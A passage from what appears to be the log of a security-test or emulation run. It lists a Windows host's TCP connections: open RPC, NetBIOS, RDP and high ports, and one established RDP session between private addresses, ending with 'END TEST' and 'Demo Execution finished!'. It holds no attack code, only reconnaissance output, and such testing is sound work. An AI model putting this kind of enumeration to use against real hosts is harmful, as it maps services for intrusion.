9730RemotePort : 0
9731State : Listen
9732PSComputerName :
9733
9734
9735Caption :
9736Description :
9737ElementName :
9738InstanceID : 0.0.0.0++49672++0.0.0.0++0
9739CommunicationStatus :
9740DetailedStatus :
9741HealthState :
9742InstallDate :
9743Name :
9744OperatingStatus :
9745OperationalStatus :
9746PrimaryStatus :
9747Status :
9748StatusDescriptions :
9749AvailableRequestedStates :
9750EnabledDefault : 2
9751EnabledState :
9752OtherEnabledState :
9753RequestedState : 5
9754TimeOfLastStateChange :
9755TransitioningToState : 12
9756AggregationBehavior :
9757Directionality :
9758CreationTime : 9/3/2019 3:08:29 AM
9759LocalAddress : 0.0.0.0
9760LocalPort : 49672
9761OwningProcess : 780
9762AppliedSetting :
9763OffloadState : InHost
9764RemoteAddress : 0.0.0.0
9765RemotePort : 0
9766State : Listen
9767PSComputerName :
9768
9769
9770Caption :
9771Description :
9772ElementName :
9773InstanceID : 0.0.0.0++49671++0.0.0.0++0
9774CommunicationStatus :
9775DetailedStatus :
9776HealthState :
9777InstallDate :
9778Name :
9779OperatingStatus :
9780OperationalStatus :
9781PrimaryStatus :
9782Status :
9783StatusDescriptions :
9784AvailableRequestedStates :
9785EnabledDefault : 2
9786EnabledState :
9787OtherEnabledState :
9788RequestedState : 5
9789TimeOfLastStateChange :
9790TransitioningToState : 12
9791AggregationBehavior :
9792Directionality :
9793CreationTime : 9/3/2019 3:08:29 AM
9794LocalAddress : 0.0.0.0
9795LocalPort : 49671
9796OwningProcess : 2740
9797AppliedSetting :
9798OffloadState : InHost
9799RemoteAddress : 0.0.0.0
9800RemotePort : 0
9801State : Listen
9802PSComputerName :
9803
9804
9805Caption :
9806Description :
9807ElementName :
9808InstanceID : 0.0.0.0++49669++0.0.0.0++0
9809CommunicationStatus :
9810DetailedStatus :
9811HealthState :
9812InstallDate :
9813Name :
9814OperatingStatus :
9815OperationalStatus :
9816PrimaryStatus :
9817Status :
9818StatusDescriptions :
9819AvailableRequestedStates :
9820EnabledDefault : 2
9821EnabledState :
9822OtherEnabledState :
9823RequestedState : 5
9824TimeOfLastStateChange :
9825TransitioningToState : 12
9826AggregationBehavior :
9827Directionality :
9828CreationTime : 9/3/2019 3:08:29 AM
9829LocalAddress : 0.0.0.0
9830LocalPort : 49669
9831OwningProcess : 2428
9832AppliedSetting :
9833OffloadState : InHost
9834RemoteAddress : 0.0.0.0
9835RemotePort : 0
9836State : Listen
9837PSComputerName :
9838
9839
9840Caption :
9841Description :
9842ElementName :
9843InstanceID : 0.0.0.0++49666++0.0.0.0++0
9844CommunicationStatus :
9845DetailedStatus :
9846HealthState :
9847InstallDate :
9848Name :
9849OperatingStatus :
9850OperationalStatus :
9851PrimaryStatus :
9852Status :
9853StatusDescriptions :
9854AvailableRequestedStates :
9855EnabledDefault : 2
9856EnabledState :
9857OtherEnabledState :
9858RequestedState : 5
9859TimeOfLastStateChange :
9860TransitioningToState : 12
9861AggregationBehavior :
9862Directionality :
9863CreationTime : 9/3/2019 3:08:27 AM
9864LocalAddress : 0.0.0.0
9865LocalPort : 49666
9866OwningProcess : 1412
9867AppliedSetting :
9868OffloadState : InHost
9869RemoteAddress : 0.0.0.0
9870RemotePort : 0
9871State : Listen
9872PSComputerName :
9873
9874
9875Caption :
9876Description :
9877ElementName :
9878InstanceID : 0.0.0.0++49665++0.0.0.0++0
9879CommunicationStatus :
9880DetailedStatus :
9881HealthState :
9882InstallDate :
9883Name :
9884OperatingStatus :
9885OperationalStatus :
9886PrimaryStatus :
9887Status :
9888StatusDescriptions :
9889AvailableRequestedStates :
9890EnabledDefault : 2
9891EnabledState :
9892OtherEnabledState :
9893RequestedState : 5
9894TimeOfLastStateChange :
9895TransitioningToState : 12
9896AggregationBehavior :
9897Directionality :
9898CreationTime : 9/3/2019 3:08:27 AM
9899LocalAddress : 0.0.0.0
9900LocalPort : 49665
9901OwningProcess : 1444
9902AppliedSetting :
9903OffloadState : InHost
9904RemoteAddress : 0.0.0.0
9905RemotePort : 0
9906State : Listen
9907PSComputerName :
9908
9909
9910Caption :
9911Description :
9912ElementName :
9913InstanceID : 0.0.0.0++49664++0.0.0.0++0
9914CommunicationStatus :
9915DetailedStatus :
9916HealthState :
9917InstallDate :
9918Name :
9919OperatingStatus :
9920OperationalStatus :
9921PrimaryStatus :
9922Status :
9923StatusDescriptions :
9924AvailableRequestedStates :
9925EnabledDefault : 2
9926EnabledState :
9927OtherEnabledState :
9928RequestedState : 5
9929TimeOfLastStateChange :
9930TransitioningToState : 12
9931AggregationBehavior :
9932Directionality :
9933CreationTime : 9/3/2019 3:08:27 AM
9934LocalAddress : 0.0.0.0
9935LocalPort : 49664
9936OwningProcess : 660
9937AppliedSetting :
9938OffloadState : InHost
9939RemoteAddress : 0.0.0.0
9940RemotePort : 0
9941State : Listen
9942PSComputerName :
9943
9944
9945Caption :
9946Description :
9947ElementName :
9948InstanceID : 0.0.0.0++5040++0.0.0.0++0
9949CommunicationStatus :
9950DetailedStatus :
9951HealthState :
9952InstallDate :
9953Name :
9954OperatingStatus :
9955OperationalStatus :
9956PrimaryStatus :
9957Status :
9958StatusDescriptions :
9959AvailableRequestedStates :
9960EnabledDefault : 2
9961EnabledState :
9962OtherEnabledState :
9963RequestedState : 5
9964TimeOfLastStateChange :
9965TransitioningToState : 12
9966AggregationBehavior :
9967Directionality :
9968CreationTime : 9/3/2019 3:09:29 AM
9969LocalAddress : 0.0.0.0
9970LocalPort : 5040
9971OwningProcess : 5468
9972AppliedSetting :
9973OffloadState : InHost
9974RemoteAddress : 0.0.0.0
9975RemotePort : 0
9976State : Listen
9977PSComputerName :
9978
9979
9980Caption :
9981Description :
9982ElementName :
9983InstanceID : 172.18.39.105++3389++172.18.39.137++33948
9984CommunicationStatus :
9985DetailedStatus :
9986HealthState :
9987InstallDate :
9988Name :
9989OperatingStatus :
9990OperationalStatus :
9991PrimaryStatus :
9992Status :
9993StatusDescriptions :
9994AvailableRequestedStates :
9995EnabledDefault : 2
9996EnabledState :
9997OtherEnabledState :
9998RequestedState : 5
9999TimeOfLastStateChange :
10000TransitioningToState : 12
10001AggregationBehavior :
10002Directionality :
10003CreationTime : 9/3/2019 3:25:17 AM
10004LocalAddress : 172.18.39.105
10005LocalPort : 3389
10006OwningProcess : 1128
10007AppliedSetting : Internet
10008OffloadState : InHost
10009RemoteAddress : 172.18.39.137
10010RemotePort : 33948
10011State : Established
10012PSComputerName :
10013
10014
10015Caption :
10016Description :
10017ElementName :
10018InstanceID : 0.0.0.0++3389++0.0.0.0++0
10019CommunicationStatus :
10020DetailedStatus :
10021HealthState :
10022InstallDate :
10023Name :
10024OperatingStatus :
10025OperationalStatus :
10026PrimaryStatus :
10027Status :
10028StatusDescriptions :
10029AvailableRequestedStates :
10030EnabledDefault : 2
10031EnabledState :
10032OtherEnabledState :
10033RequestedState : 5
10034TimeOfLastStateChange :
10035TransitioningToState : 12
10036AggregationBehavior :
10037Directionality :
10038CreationTime : 9/3/2019 3:08:27 AM
10039LocalAddress : 0.0.0.0
10040LocalPort : 3389
10041OwningProcess : 1128
10042AppliedSetting :
10043OffloadState : InHost
10044RemoteAddress : 0.0.0.0
10045RemotePort : 0
10046State : Listen
10047PSComputerName :
10048
10049
10050Caption :
10051Description :
10052ElementName :
10053InstanceID : 172.18.39.105++139++0.0.0.0++0
10054CommunicationStatus :
10055DetailedStatus :
10056HealthState :
10057InstallDate :
10058Name :
10059OperatingStatus :
10060OperationalStatus :
10061PrimaryStatus :
10062Status :
10063StatusDescriptions :
10064AvailableRequestedStates :
10065EnabledDefault : 2
10066EnabledState :
10067OtherEnabledState :
10068RequestedState : 5
10069TimeOfLastStateChange :
10070TransitioningToState : 12
10071AggregationBehavior :
10072Directionality :
10073CreationTime : 9/3/2019 3:08:28 AM
10074LocalAddress : 172.18.39.105
10075LocalPort : 139
10076OwningProcess : 4
10077AppliedSetting :
10078OffloadState : InHost
10079RemoteAddress : 0.0.0.0
10080RemotePort : 0
10081State : Listen
10082PSComputerName :
10083
10084
10085Caption :
10086Description :
10087ElementName :
10088InstanceID : 0.0.0.0++135++0.0.0.0++0
10089CommunicationStatus :
10090DetailedStatus :
10091HealthState :
10092InstallDate :
10093Name :
10094OperatingStatus :
10095OperationalStatus :
10096PrimaryStatus :
10097Status :
10098StatusDescriptions :
10099AvailableRequestedStates :
10100EnabledDefault : 2
10101EnabledState :
10102OtherEnabledState :
10103RequestedState : 5
10104TimeOfLastStateChange :
10105TransitioningToState : 12
10106AggregationBehavior :
10107Directionality :
10108CreationTime : 9/3/2019 3:08:27 AM
10109LocalAddress : 0.0.0.0
10110LocalPort : 135
10111OwningProcess : 524
10112AppliedSetting :
10113OffloadState : InHost
10114RemoteAddress : 0.0.0.0
10115RemotePort : 0
10116State : Listen
10117PSComputerName :
10118
10119Determining tests for Windows
10120Unable to run non-Windows tests
10121[!!!!!!!!END TEST!!!!!!!]
10122
10123
10124[] Demo Execution finished!